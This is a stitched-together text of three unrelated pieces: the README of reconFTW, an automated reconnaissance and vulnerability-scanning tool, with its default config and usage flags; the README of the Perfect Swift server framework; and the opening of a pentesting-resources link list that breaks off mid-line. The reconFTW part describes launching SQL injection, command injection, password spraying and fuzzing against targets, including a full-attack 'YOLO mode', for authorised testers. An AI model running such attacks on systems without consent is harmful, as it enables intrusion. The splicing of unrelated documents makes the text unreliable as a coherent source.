Docker Image 🐳 (3 options) - Pull the image ```bash $ docker pull six2dez/reconftw:main ``` - Run the container ``` $ docker run -it --rm \ -v "${PWD}/OutputFolder/":'/reconftw/Recon/' \ six2dez/reconftw:main -d example.com -r ``` However, if you wish to: 1. Dynamically modify the behaviour & function of the image 2. Build your own container 3. Build an Axiom Controller on top of the official image Please refer to the [Docker](https://github.com/six2dez/reconftw/wiki/4.-Docker) documentation. ## c) Terraform + Ansible Yes! reconFTW can also be easily deployed with Terraform and Ansible to AWS, if you want to know how to do it, you can check the guide [here](Terraform/README.md) # ⚙️ Config file: > You can find a detailed explanation of the configuration file [here](https://github.com/six2dez/reconftw/wiki/3.-Configuration-file) :book: - Through ```reconftw.cfg``` file the whole execution of the tool can be controlled. - Hunters can set various scanning modes, execution preferences, tools, config files, APIs/TOKENS, personalized wordlists and much more. <details> <br><br> <summary> :point_right: Click here to view default config file :point_left: </summary> ```yaml ################################################################# # reconFTW config file # ################################################################# # General values tools=~/Tools # Path installed tools SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" # Get current script's path profile_shell=".$(basename $(echo $SHELL))rc" # Get current shell profile reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) # Fetch current reconftw version generate_resolvers=false # Generate custom resolvers with dnsvalidator update_resolvers=true # Fetch and rewrite resolvers before DNS resolution proxy_url="http://127.0.0.1:8080/" # Proxy url install_golang=true # Set it to false if you already have Golang configured and ready #dir_output=/custom/output/path # Golang Vars (Comment or change on your own) export GOROOT=/usr/local/go export GOPATH=$HOME/go export PATH=$GOPATH/bin:$GOROOT/bin:$HOME/.local/bin:$PATH # Tools config files #NOTIFY_CONFIG=~/.config/notify/provider-config.yaml # No need to define AMASS_CONFIG=~/.config/amass/config.ini GITHUB_TOKENS=${tools}/.github_tokens #CUSTOM_CONFIG=custom_config_path.txt # In case you use a custom config file, uncomment this line and set your files path # APIs/TOKENS - Uncomment the lines you want removing the '#' at the beginning of the line #SHODAN_API_KEY="XXXXXXXXXXXXX" #WHOISXML_API="XXXXXXXXXX" #XSS_SERVER="XXXXXXXXXXXXXXXXX" #COLLAB_SERVER="XXXXXXXXXXXXXXXXX" #slack_channel="XXXXXXXX" #slack_auth="xoXX-XXX-XXX-XXX" # File descriptors DEBUG_STD="&>/dev/null" # Skips STD output on installer DEBUG_ERROR="2>/dev/null" # Skips ERR output on installer # Osint OSINT=true # Enable or disable the whole OSINT module GOOGLE_DORKS=true GITHUB_DORKS=true GITHUB_REPOS=true METADATA=true # Fetch metadata from indexed office documents EMAILS=true # Fetch emails from differents sites DOMAIN_INFO=true # whois info REVERSE_WHOIS=true # amass intel reverse whois info, takes some time IP_INFO=true # Reverse IP search, geolocation and whois METAFINDER_LIMIT=20 # Max 250 # Subdomains RUNAMASS=true RUNSUBFINDER=true SUBDOMAINS_GENERAL=true # Enable or disable the whole Subdomains module SUBPASSIVE=true # Passive subdomains search SUBCRT=true # crtsh search SUBNOERROR=true # Check DNS NOERROR response and BF on them SUBANALYTICS=true # Google Analytics search SUBBRUTE=true # DNS bruteforcing SUBSCRAPING=true # Subdomains extraction from web crawling SUBPERMUTE=true # DNS permutations PERMUTATIONS_OPTION=gotator # The alternative is "ripgen" (faster, not deeper) GOTATOR_FLAGS="-depth 1 -numbers 3 -mindup -adv -md" # Flags for gotator SUBTAKEOVER=false # Check subdomain takeovers, false by default cuz nuclei already check this SUB_RECURSIVE_PASSIVE=false # Uses a lot of API keys queries DEEP_RECURSIVE_PASSIVE=10 # Number of top subdomains for recursion SUB_RECURSIVE_BRUTE=false # Needs big disk space and time to resolve ZONETRANSFER=true # Check zone transfer S3BUCKETS=true # Check S3 buckets misconfigs REVERSE_IP=false # Check reverse IP subdomain search (set True if your target is CIDR/IP) TLS_PORTS="21,22,25,80,110,135,143,261,271,324,443,448,465,563,614,631,636,664,684,695,832,853,854,990,993,989,992,994,995,1129,1131,1184,2083,2087,2089,2096,2221,2252,2376,2381,2478,2479,2482,2484,2679,2762,3077,3078,3183,3191,3220,3269,3306,3410,3424,3471,3496,3509,3529,3539,3535,3660,36611,3713,3747,3766,3864,3885,3995,3896,4031,4036,4062,4064,4081,4083,4116,4335,4336,4536,4590,4740,4843,4849,5443,5007,5061,5321,5349,5671,5783,5868,5986,5989,5990,6209,6251,6443,6513,6514,6619,6697,6771,7202,7443,7673,7674,7677,7775,8243,8443,8991,8989,9089,9295,9318,9443,9444,9614,9802,10161,10162,11751,12013,12109,14143,15002,16995,41230,16993,20003" INSCOPE=false # Uses inscope tool to filter the scope, requires .scope file in reconftw folder # Web detection WEBPROBESIMPLE=true # Web probing on 80/443 WEBPROBEFULL=true # Web probing in a large port list WEBSCREENSHOT=true # Webs screenshooting VIRTUALHOSTS=false # Check virtualhosts by fuzzing HOST header NMAP_WEBPROBE=true # If disabled it will run httpx directly over subdomains list, nmap before web probing is used to increase the speed and avoid repeated requests UNCOMMON_PORTS_WEB="81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3001,3002,3003,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672" # You can change to aquatone if gowitness fails, comment the one you don't want AXIOM_SCREENSHOT_MODULE=webscreenshot # Choose between aquatone,gowitness,webscreenshot # Host FAVICON=true # Check Favicon domain discovery PORTSCANNER=true # Enable or disable the whole Port scanner module PORTSCAN_PASSIVE=true # Port scanner with Shodan PORTSCAN_ACTIVE=true # Port scanner with nmap CDN_IP=true # Check which IPs belongs to CDN # Web analysis WAF_DETECTION=true # Detect WAFs NUCLEICHECK=true # Enable or disable nuclei NUCLEI_SEVERITY="info,low,medium,high,critical" # Set templates criticity NUCLEI_FLAGS="-silent -t ~/nuclei-templates/ -retries 2" # Additional nuclei extra flags, don't set the severity here but the exclusions like "-etags openssh" NUCLEI_FLAGS_JS="-silent -tags exposure,token -severity info,low,medium,high,critical" # Additional nuclei extra flags for js secrets URL_CHECK=true # Enable or disable URL collection URL_CHECK_PASSIVE=true # Search for urls, passive methods from Archive, OTX, CommonCrawl, etc URL_CHECK_ACTIVE=true # Search for urls by crawling the websites URL_GF=true # Url patterns classification URL_EXT=true # Returns a list of files divided by extension JSCHECKS=true # JS analysis FUZZ=true # Web fuzzing CMS_SCANNER=true # CMS scanner WORDLIST=true # Wordlist generation ROBOTSWORDLIST=true # Check historic disallow entries on waybackMachine PASSWORD_DICT=true # Generate password dictionary PASSWORD_MIN_LENGTH=5 # Min password lenght PASSWORD_MAX_LENGTH=14 # Max password lenght # Vulns VULNS_GENERAL=false # Enable or disable the vulnerability module (very intrusive and slow) XSS=true # Check for xss with dalfox CORS=true # CORS misconfigs TEST_SSL=true # SSL misconfigs OPEN_REDIRECT=true # Check open redirects SSRF_CHECKS=true # SSRF checks CRLF_CHECKS=true # CRLF checks LFI=true # LFI by fuzzing SSTI=true # SSTI by fuzzing SQLI=true # Check SQLI with sqlmap BROKENLINKS=true # Check for brokenlinks SPRAY=true # Performs password spraying COMM_INJ=true # Check for command injections with commix PROTO_POLLUTION=true # Check for prototype pollution flaws SMUGGLING=true # Check for HTTP request smuggling flaws WEBCACHE=true # Check for HTTP request smuggling flaws # Extra features NOTIFICATION=false # Notification for every function SOFT_NOTIFICATION=false # Only for start/end DEEP=false # DEEP mode, really slow and don't care about the number of results DEEP_LIMIT=500 # First limit to not run unless you run DEEP DEEP_LIMIT2=1500 # Second limit to not run unless you run DEEP DIFF=false # Diff function, run every module over an already scanned target, printing only new findings (but save everything) REMOVETMP=false # Delete temporary files after execution (to free up space) REMOVELOG=false # Delete logs after execution PROXY=false # Send to proxy the websites found SENDZIPNOTIFY=false # Send to zip the results (over notify) PRESERVE=true # set to true to avoid deleting the .called_fn files on really large scans FFUF_FLAGS="-mc all -fc 404 -ac -sf" # Ffuf flags HTTPX_FLAGS="-follow-redirects -random-agent -status-code -silent -title -web-server -tech-detect -location" # Httpx flags for simple web probing # HTTP options HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0" # Default header # Threads FFUF_THREADS=40 HTTPX_THREADS=50 HTTPX_UNCOMMONPORTS_THREADS=100 KATANA_THREADS=20 BRUTESPRAY_THREADS=20 BRUTESPRAY_CONCURRENCE=10 GAU_THREADS=10 DNSTAKE_THREADS=100 DALFOX_THREADS=200 PUREDNS_PUBLIC_LIMIT=0 # Set between 2000 - 10000 if your router blows up, 0 means unlimited PUREDNS_TRUSTED_LIMIT=400 PUREDNS_WILDCARDTEST_LIMIT=30 PUREDNS_WILDCARDBATCH_LIMIT=1500000 WEBSCREENSHOT_THREADS=200 GOWITNESS_THREADS=8 RESOLVE_DOMAINS_THREADS=150 PPFUZZ_THREADS=30 DNSVALIDATOR_THREADS=200 INTERLACE_THREADS=10 TLSX_THREADS=1000 XNLINKFINDER_DEPTH=3 # Rate limits HTTPX_RATELIMIT=150 NUCLEI_RATELIMIT=150 FFUF_RATELIMIT=0 # Timeouts AMASS_INTEL_TIMEOUT=15 # Minutes AMASS_ENUM_TIMEOUT=180 # Minutes CMSSCAN_TIMEOUT=3600 # Seconds FFUF_MAXTIME=900 # Seconds HTTPX_TIMEOUT=10 # Seconds HTTPX_UNCOMMONPORTS_TIMEOUT=10 # Seconds PERMUTATIONS_LIMIT=21474836480 # Bytes, default is 20 GB # lists fuzz_wordlist=${tools}/fuzz_wordlist.txt lfi_wordlist=${tools}/lfi_wordlist.txt ssti_wordlist=${tools}/ssti_wordlist.txt subs_wordlist=${tools}/subdomains.txt subs_wordlist_big=${tools}/subdomains_big.txt resolvers=${tools}/resolvers.txt resolvers_trusted=${tools}/resolvers_trusted.txt # Axiom Fleet # Will not start a new fleet if one exist w/ same name and size (or larger) # AXIOM=false Uncomment only to overwrite command line flags AXIOM_FLEET_LAUNCH=true # Enable or disable spin up a new fleet, if false it will use the current fleet with the AXIOM_FLEET_NAME prefix AXIOM_FLEET_NAME="reconFTW" # Fleet's prefix name AXIOM_FLEET_COUNT=5 # Fleet's number AXIOM_FLEET_REGIONS="eu-central" # Fleet's region AXIOM_FLEET_SHUTDOWN=true # # Enable or disable delete the fleet after the execution # This is a script on your reconftw host that might prep things your way... #AXIOM_POST_START="~/Tools/axiom_config.sh" # Useful to send your config files to the fleet AXIOM_EXTRA_ARGS="" # Leave empty if you don't want to add extra arguments #AXIOM_EXTRA_ARGS="--rm-logs" # Example # BBRF BBRF_CONNECTION=false BBRF_SERVER=https://demo.bbrf.me/bbrf BBRF_USERNAME="user" BBRF_PASSWORD="password" # TERM COLORS bred='\033[1;31m' bblue='\033[1;34m' bgreen='\033[1;32m' byellow='\033[1;33m' red='\033[0;31m' blue='\033[0;34m' green='\033[0;32m' yellow='\033[0;33m' reset='\033[0m' ``` </details> # Usage: > Check out the wiki section to know which flag performs what all steps/attacks [Usage Guide](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide) :book: **TARGET OPTIONS** | Flag | Description | |------|-------------| | -d | Single Target domain *(example.com)* | | -l | List of targets *(one per line)* | | -m | Multiple domain target *(companyName)* | | -x | Exclude subdomains list *(Out Of Scope)* | | -i | Include subdomains list *(In Scope)* | **MODE OPTIONS** | Flag | Description | |------|-------------| | -r | Recon - Full recon process (without attacks like sqli,ssrf,xss,ssti,lfi etc.) | | -s | Subdomains - Perform only subdomain enumeration, web probing, subdomain takeovers | | -p | Passive - Perform only passive steps | | -a | All - Perform whole recon and all active attacks | | -w | Web - Perform only vulnerability checks/attacks on particular target | | -n | OSINT - Performs an OSINT scan (no subdomain enumeration and attacks) | | -c | Custom - Launches specific function against target | | -h | Help - Show this help menu | **GENERAL OPTIONS** | Flag | Description | |------|-------------| | --deep | Deep scan (Enable some slow options for deeper scan, _vps intended mode_) | | -f | Custom config file path | | -o | Output directory | | -v | Axiom distributed VPS | | -q | Rate limit in requests per second | # Example Usage: **To perform a full recon on single target** ```bash ./reconftw.sh -d target.com -r ``` **To perform a full recon on a list of targets** ```bash ./reconftw.sh -l sites.txt -r -o /output/directory/ ``` **Perform full recon with more time intense tasks** *(VPS intended only)* ```bash ./reconftw.sh -d target.com -r --deep -o /output/directory/ ``` **Perform recon in a multi domain target** ```bash ./reconftw.sh -m company -l domains_list.txt -r ``` **Perform recon with axiom integration** ```bash ./reconftw.sh -d target.com -r -v ``` **Perform all steps (whole recon + all attacks) a.k.a. YOLO mode** ```bash ./reconftw.sh -d target.com -a ``` **Show help section** ```bash ./reconftw.sh -h ``` # Axiom Support: :cloud: ![](https://i.ibb.co/Jzrgkqt/axiom-readme.png) > Check out the wiki section for more info [Axiom Support](https://github.com/six2dez/reconftw/wiki/5.-Axiom-version) * As reconFTW actively hits the target with a lot of web traffic, hence there was a need to move to Axiom distributing the work load among various instances leading to reduction of execution time. * During the configuration of axiom you need to select `reconftw` as provisoner. * You can create your own axiom's fleet before running reconFTW or let reconFTW to create and destroy it automatically just modifying reconftw.cfg file. # BBRF Support: :computer: * To add reconFTW results to your [BBRF instance](https://github.com/honoki/bbrf-server) just add IP and credentials to reconftw.cfg file section dedicated to bbrf. * During the execution of the scans the results will be added dynamically when each step ends. * Even you can set up locally your BBRF instance to be able to visualize your results in a fancy web UI. # Sample video: ![Video](images/reconFTW.gif) # :fire: Features :fire: ## Osint - Domain information ([whois](https://github.com/rfc1036/whois) and [amass](https://github.com/OWASP/Amass)) - Emails addresses and users ([theHarvester](https://github.com/laramies/theHarvester) and [emailfinder](https://github.com/Josue87/EmailFinder)) - Password leaks ([pwndb](https://github.com/davidtavarez/pwndb) and [H8mail](https://github.com/khast3x/h8mail)) - Metadata finder ([MetaFinder](https://github.com/Josue87/MetaFinder)) - Google Dorks ([dorks_hunter](https://github.com/six2dez/dorks_hunter)) - Github Dorks ([gitdorks_go](https://github.com/damit5/gitdorks_go)) - GitHub org analysis ([enumerepo](https://github.com/trickest/enumerepo) and [trufflehog](https://github.com/trufflesecurity/trufflehog)) ## Subdomains - Passive ([amass](https://github.com/OWASP/Amass), [subfinder](https://github.com/projectdiscovery/subfinder) and [github-subdomains](https://github.com/gwen001/github-subdomains)) - Certificate transparency ([ctfr](https://github.com/UnaPibaGeek/ctfr)) - NOERROR subdomain discovery ([dnsx](https://github.com/projectdiscovery/dnsx), more info [here](https://www.securesystems.de/blog/enhancing-subdomain-enumeration-ents-and-noerror/)) - Bruteforce ([puredns](https://github.com/d3mondev/puredns)) - Permutations ([Gotator](https://github.com/Josue87/gotator), [ripgen](https://github.com/resyncgg/ripgen) and [regulator](https://github.com/cramppet/regulator)) - JS files & Source Code Scraping ([katana](https://github.com/projectdiscovery/katana)) - DNS Records ([dnsx](https://github.com/projectdiscovery/dnsx)) - Google Analytics ID ([AnalyticsRelationships](https://github.com/Josue87/AnalyticsRelationships)) - TLS handshake ([tlsx](https://github.com/projectdiscovery/tlsx)) - Recursive search ([dsieve](https://github.com/trickest/dsieve)). - Subdomains takeover ([nuclei](https://github.com/projectdiscovery/nuclei)) - DNS takeover ([dnstake](https://github.com/pwnesia/dnstake)) - DNS Zone Transfer ([dig](https://linux.die.net/man/1/dig)) - Cloud checkers ([S3Scanner](https://github.com/sa7mon/S3Scanner) and [cloud_enum](https://github.com/initstring/cloud_enum)) ## Hosts - IP info ([whoisxmlapi API](https://www.whoisxmlapi.com/)) - CDN checker ([ipcdn](https://github.com/six2dez/ipcdn)) - WAF checker ([wafw00f](https://github.com/EnableSecurity/wafw00f)) - Port Scanner (Active with [nmap](https://github.com/nmap/nmap) and passive with [smap](https://github.com/s0md3v/Smap)) - Port services vulnerability checks ([searchsploit](https://github.com/offensive-security/exploitdb)) - Password spraying ([brutespray](https://github.com/x90skysn3k/brutespray)) ## Webs - Web Prober ([httpx](https://github.com/projectdiscovery/httpx) and [unimap](https://github.com/Edu4rdSHL/unimap)) - Web screenshoting ([webscreenshot](https://github.com/maaaaz/webscreenshot) or [gowitness](https://github.com/sensepost/gowitness)) - Web templates scanner ([nuclei](https://github.com/projectdiscovery/nuclei) and [nuclei geeknik](https://github.com/geeknik/the-nuclei-templates.git)) - CMS Scanner ([CMSeeK](https://github.com/Tuhinshubhra/CMSeeK)) - Url extraction ([waymore](https://github.com/xnl-h4ck3r/waymore), [katana](https://github.com/projectdiscovery/katana), [github-endpoints](https://gist.github.com/six2dez/d1d516b606557526e9a78d7dd49cacd3) and [JSA](https://github.com/w9w/JSA)) - URL patterns Search and filtering ([urless](https://github.com/xnl-h4ck3r/urless), [gf](https://github.com/tomnomnom/gf) and [gf-patterns](https://github.com/1ndianl33t/Gf-Patterns)) - Favicon Real IP ([fav-up](https://github.com/pielco11/fav-up)) - Javascript analysis ([subjs](https://github.com/lc/subjs), [JSA](https://github.com/w9w/JSA), [xnLinkFinder](https://github.com/xnl-h4ck3r/xnLinkFinder), [getjswords](https://github.com/m4ll0k/BBTz)) - Fuzzing ([ffuf](https://github.com/ffuf/ffuf)) - URL sorting by extension - Wordlist generation - Passwords dictionary creation ([pydictor](https://github.com/LandGrey/pydictor)) ## Vulnerability checks - XSS ([dalfox](https://github.com/hahwul/dalfox)) - Open redirect ([Oralyzer](https://github.com/r0075h3ll/Oralyzer)) - SSRF (headers [interactsh](https://github.com/projectdiscovery/interactsh) and param values with [ffuf](https://github.com/ffuf/ffuf)) - CRLF ([crlfuzz](https://github.com/dwisiswant0/crlfuzz)) - Cors ([Corsy](https://github.com/s0md3v/Corsy)) - LFI Checks ([ffuf](https://github.com/ffuf/ffuf)) - SQLi Check ([SQLMap](https://github.com/sqlmapproject/sqlmap)) - SSTI ([ffuf](https://github.com/ffuf/ffuf)) - SSL tests ([testssl](https://github.com/drwetter/testssl.sh)) - Broken Links Checker ([katana](https://github.com/projectdiscovery/katana)) - Prototype Pollution ([ppfuzz](https://github.com/dwisiswant0/ppfuzz)) - Web Cache Vulnerabilities ([Web-Cache-Vulnerability-Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner)) - 4XX Bypasser ([byp4xx](https://github.com/lobuhi/byp4xx)) ## Extras - Multithreading ([Rush](https://github.com/shenwei356/rush)) - Custom resolvers generated list ([dnsvalidator](https://github.com/vortexau/dnsvalidator)) - Docker container included and [DockerHub](https://hub.docker.com/r/six2dez/reconftw) integration - Ansible + Terraform deployment over AWS - Allows IP/CIDR as target - Resume the scan from last performed step - Custom output folder option - All in one installer/updater script compatible with most distros - Diff support for continuous running (cron mode) - Support for targets with multiple domains - Raspberry Pi/ARM support - 6 modes (recon, passive, subdomains, web, osint and all) - Out of Scope Support + optional [inscope](https://github.com/tomnomnom/hacks/tree/master/inscope) support - Notification system with Slack, Discord and Telegram ([notify](https://github.com/projectdiscovery/notify)) and sending zipped results support # Mindmap/Workflow ![Mindmap](images/mindmapv2.png) ## Data Keep Follow these simple steps to end up with a private repository with your `API Keys` and `/Recon` data. ### Makefile A `Makefile` is provided to quickly bootstrap a private repo. To use it, you'll need the [Github CLI](https://cli.github.com/) installed. Once done, just run: ```bash # below line is optional, the default is ~/reconftw-data export PRIV_REPO="$HOME/reconftw-data" make bootstrap ``` To sync your private repo with upstream: ```bash make sync ``` To upload juicy recon data: ```bash make upload ``` ### Manual * Create a private __blank__ repository on `Git(Hub|Lab)` (Take into account size limits regarding Recon data upload) * Clone your project: `git clone https://gitlab.com/example/reconftw-data` * Get inside the cloned repository: `cd reconftw-data` * Create a new branch with an empty commit: `git commit --allow-empty -m "Empty commit"` * Add the official repo as a new remote: `git remote add upstream https://github.com/six2dez/reconftw` (`upstream` is an example) * Update upstream's repo: `git fetch upstream` * Rebase current branch with the official one: `git rebase upstream/main master` ### Main commands: * Upload changes to your personal repo: `git add . && git commit -m "Data upload" && git push origin master` * Update tool anytime: `git fetch upstream && git rebase upstream/main master` ## How to contribute: If you want to contribute to this project, you can do it in multiple ways: - Submitting an [issue](https://github.com/six2dez/reconftw/issues/new/choose) because you have found a bug or you have any suggestion or request. - Making a Pull Request from [dev](https://github.com/six2dez/reconftw/tree/dev) branch because you want to improve the code or add something to the script. ## Need help? :information_source: - Take a look at the [wiki](https://github.com/six2dez/reconftw/wiki) section. - Check [FAQ](https://github.com/six2dez/reconftw/wiki/7.-FAQs) for commonly asked questions. - Join our [Discord server](https://discord.gg/R5DdXVEdTy) - Ask for help in the [Telegram group](https://t.me/joinchat/TO_R8NYFhhbmI5co) ## Support this project ### Buymeacoffee [<img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png">](https://www.buymeacoffee.com/six2dez) ### DigitalOcean referral link <a href="https://www.digitalocean.com/?refcode=f362a6e193a1&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge"><img src="https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg" alt="DigitalOcean Referral Badge" /></a> ### GitHub sponsorship [Sponsor](https://github.com/sponsors/six2dez) # Sponsors ❤️ **This section shows the current financial sponsors of this project** [<img src="https://pbs.twimg.com/profile_images/1360304248534282240/MomOFi40_400x400.jpg" width="100" height=auto>](https://github.com/0xtavian) # Thanks :pray: * Thank you for lending a helping hand towards the development of the project! - [C99](https://api.c99.nl/) - [CIRCL](https://www.circl.lu/) - [NetworksDB](https://networksdb.io/) - [ipinfo](https://ipinfo.io/) - [hackertarget](https://hackertarget.com/) - [Censys](https://censys.io/) - [Fofa](https://fofa.info/) - [intelx](https://intelx.io/) - [Whoxy](https://www.whoxy.com/) # Disclaimer Usage of this program for attacking targets without consent is illegal. It is the user's responsibility to obey all applicable laws. The developer assumes no liability and is not responsible for any misuse or damage caused by this program. Please use responsibly. The material contained in this repository is licensed under GNU GPLv3.
# Perfect: Server-Side Swift [简体中文](README.zh_CN.md) <p align="center"> <a href="http://perfect.org/get-involved.html" target="_blank"> <img src="http://perfect.org/assets/github/perfect_github_2_0_0.jpg" alt="Get Involed with Perfect!" width="854" /> </a> </p> <p align="center"> <a href="https://developer.apple.com/swift/" target="_blank"> <img src="https://img.shields.io/badge/Swift-5.2-orange.svg?style=flat" alt="Swift 5.2"> </a> <a href="https://developer.apple.com/swift/" target="_blank"> <img src="https://img.shields.io/badge/Platforms-OS%20X%20%7C%20Linux%20-lightgray.svg?style=flat" alt="Platforms macOS | Linux"> </a> <a href="http://perfect.org/licensing.html" target="_blank"> <img src="https://img.shields.io/badge/License-Apache-lightgrey.svg?style=flat" alt="License Apache"> </a> </p> ## Perfect: Server-Side Swift Perfect is a complete and powerful toolbox, framework, and application server for Linux, iOS, and macOS (OS X). It provides everything a Swift engineer needs for developing lightweight, maintainable, and scalable apps and other REST services entirely in the Swift programming language for both client-facing and server-side applications. Perfect includes a suite of tools that will enhance your productivity as you use only one programming language to build your apps: Swift. The global development community’s most dynamic and popular server-side toolbox and framework available today, Perfect is the backbone for many live web applications and apps available on iTunes. This guide is designed for developers at all levels of experience to get Perfect up and running quickly. ## Working with Perfect ### Compatibility with Swift The master branch of this project currently compiles with **Xcode 11** or the **Swift 5** toolchain on Ubuntu. ### Getting Started [Access a tutorial](https://github.com/PerfectlySoft/PerfectDocs/blob/master/guide/gettingStarted.md) to help you get started using Perfect quickly. It includes straightforward examples of how Perfect can be used. ### Documentation [Get started working with Perfect](https://github.com/PerfectlySoft/PerfectDocs), deploy your apps, and find more detailed help by consulting our reference library. We welcome contributions to Perfect’s documentation. If you spot a typo, bug, or other errata, or have additions or suggestions to recommend, please create a pull request or issue in Github. ### Community We all need a little help now and then. If you do too, don’t be shy, ask us or the friendly and supportive Perfect community: [Slack](http://perfect.ly/) | [Twitter](https://twitter.com/perfectlysoft) ### Deployment Your Perfect project can be deployed to any Swift compatible Linux server. We provide a macOS desktop application, [Perfect Assistant](https://www.perfect.org/en/perfect-assistant.html), to help with AWS and Google Cloud deployments. Additional deployment options are in the works. ### Samples, Examples, and Tutorials Our library continues to grow as members of [the Swift-Perfect development community have shared many samples and examples](https://github.com/PerfectExamples) of their projects in Perfect. Examples include: - [WebSockets Server](https://github.com/PerfectExamples/PerfectExample-WebSocketsServer) - [URL Routing](https://github.com/PerfectExamples/PerfectExample-URLRouting) - [Upload Enumerator](https://github.com/PerfectExamples/PerfectExample-UploadEnumerator) There are [many more examples](https://github.com/PerfectExamples) you can explore. Please share yours! ## Core Perfect Modules Perfect project is divided into several repositories to make it easy for you to find, download, and install the components you need: - [Perfect](https://github.com/PerfectlySoft/Perfect) – This repository contains the core PerfectLib and will continue to be the main landing point for the project - [Perfect Docs](https://github.com/PerfectlySoft/PerfectDocs) – Contains all API reference-related material ### Examples - [Perfect Template](https://github.com/PerfectlySoft/PerfectTemplate) - A simple starter project which compiles with the Swift Package Manager into a standalone executable HTTP server. This repository is ideal for starting a Perfect-based project - [Perfect Examples](https://github.com/PerfectExamples) - All the Perfect example projects ### DataSources - [Perfect Redis](https://github.com/PerfectlySoft/Perfect-Redis) - The Redis database connector - [Perfect SQLite](https://github.com/PerfectlySoft/Perfect-SQLite) - SQLite3 database connector - [Perfect PostgreSQL](https://github.com/PerfectlySoft/Perfect-PostgreSQL) - PostgreSQL database connector - [Perfect MySQL](https://github.com/PerfectlySoft/Perfect-MySQL) - MySQL database connector - [Perfect MongoDB](https://github.com/PerfectlySoft/Perfect-MongoDB) - MongoDB database connector - [Perfect FileMaker](https://github.com/PerfectlySoft/Perfect-FileMaker) - FileMaker Server database connector ### Utilities - [Perfect FastCGI Apache 2.4](https://github.com/PerfectlySoft/Perfect-FastCGI-Apache2.4) - Apache 2.4 FastCGI module; required for the Perfect FastCGI server variant - [Perfect XML](https://github.com/PerfectlySoft/Perfect-XML) - DOM Core level 2 read-only APIs and XPath support - [Perfect HTTP Server](https://github.com/PerfectlySoft/Perfect-HTTPServer) - HTTP 1.1 server for Perfect - [Perfect Mustache](https://github.com/PerfectlySoft/Perfect-Mustache) - Mustache template support for Perfect - [Perfect CURL](https://github.com/PerfectlySoft/Perfect-CURL) - cURL support for Perfect - [Perfect WebSockets](https://github.com/PerfectlySoft/Perfect-WebSockets) - WebSockets support for Perfect - [Perfect Zip](https://github.com/PerfectlySoft/Perfect-Zip) - provides simple zip and unzip functionality - [Perfect Notifications](https://github.com/PerfectlySoft/Perfect-Notifications) - provides support for Apple Push Notification Service (APNS). ## More about Perfect Perfect operates using either a standalone [HTTP server](https://github.com/PerfectlySoft/Perfect-HTTP), [HTTPS server](https://github.com/PerfectlySoft/Perfect-HTTPServer), or through [FastCGI server](https://github.com/PerfectlySoft/Perfect-FastCGI). It provides a system for loading your Swift-based modules at startup, for interfacing those modules with its request/response objects, or to the built-in [Mustache template processing system](https://github.com/PerfectlySoft/Perfect-Mustache). Perfect is built on a completely asynchronous, high-performance networking engine to provide a scalable option for internet services. It supports Secure Sockets Layer (SSL) encryption, and it features a suite of tools commonly required by internet servers such as [WebSockets](https://github.com/PerfectlySoft/Perfect-WebSockets) and [iOS push notifications](https://github.com/PerfectlySoft/Perfect-Notifications), but you are not limited to those options. Feel free to use your favourite JSON or templating systems, etc. ### Join and Contribute to the Community The Swift-Perfect developer community is vital to improving Perfect and supporting one another.   You can help other developers by sharing your expertise and tips, as well as learn from others, by joining the [Perfect Slack channel](http://perfect.ly). Contributions of all kinds are welcome: reporting issues, updating documentation, fixing bugs, building examples, sharing projects, and any other tips that may help the Swift-Perfect community. If you would like to share your example project, tutorial, or video, please share the URL of your work on GitHub and [Twitter](https://twitter.com/perfectlysoft), and the Perfect team will highlight it to the community. ### Code of Conduct The Perfect team welcomes people of all ethnicities, nationalities, ages, gender, disability, levels of experience, and religious beliefs to use and contribute to the Perfect project. We pledge to foster and enforce a harassment-free environment of openness, respect, and cooperation for everyone in all project and public spaces online or offline. Please report any behaviour that violates our [Code of Conduct](https://github.com/PerfectlySoft/Perfect/blob/master/CODE_OF_CONDUCT.md) to [[email protected]](mailto:[email protected]). The Perfect team is committed to enforcing this Code of Conduct to ensure everyone who wishes to use, contribute to, and comment on the Perfect project may do so freely and openly and without fear of reprisal. We will investigate all complaints of unacceptable or abusive behaviour or comments expediently, and we will maintain the confidentiality of the person who reports any perceived infraction or wrongdoing to us. We will not tolerate any form of direct or indirect harassment or discrimination within the Swift-Perfect community, and will take appropriate, fair, and corrective action to any instance of inappropriate behaviour. The Perfect team maintains the right to remove, edit, or reject any comments, code, edits, or issues that do not align with our Code of Conduct.
# PEN TESTERS (Under Development) 1. Company have PEN TESTERS team to conduct pentesting. 2. Company HIRING PEN TEST SERVICES - on hourly basis or project basis. # PentestingEbook overview: Author Pentesting | Title -- | -- 1. [Practicle Hardware pentesting](https://t.me/freedomf0x/16886) 2. [Pentesting Industrial Control Stytem.](https://t.me/freedomf0x/16889) 3. [Network Pentesting](https://t.me/freedomf0x/12884) 4. [Web pentesting](https://t.me/freedomf0x/16879)(https://t.me/freedomf0x/14577) 5. [Pentesting Azure](https://t.me/freedomf0x/16891) , [window server](https://t.me/freedomf0x/15382), [powershell, and active directory](https://t.me/freedomf0x/12882) # Pentesting for Researchers Author Pentesting | Title -- | -- **1** Vulnerabilityassessment | [Penetration Testing Framework 0.59](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html) **2** Elijah | [Pentesting Notes](https://github.com/dostoevskylabs/dostoevsky-pentest-notes) **3** Chryzsh | [Beginner Friendly's Pentesting](https://chryzsh.gitbooks.io/pentestbook/content/) **4** Pentesting Standard | [High Level Pentesting Standard](http://www.pentest-standard.org/index.php/Main_Page)) **5** Phases of Infrastructure Pentest | [All the phases of Infrastructure 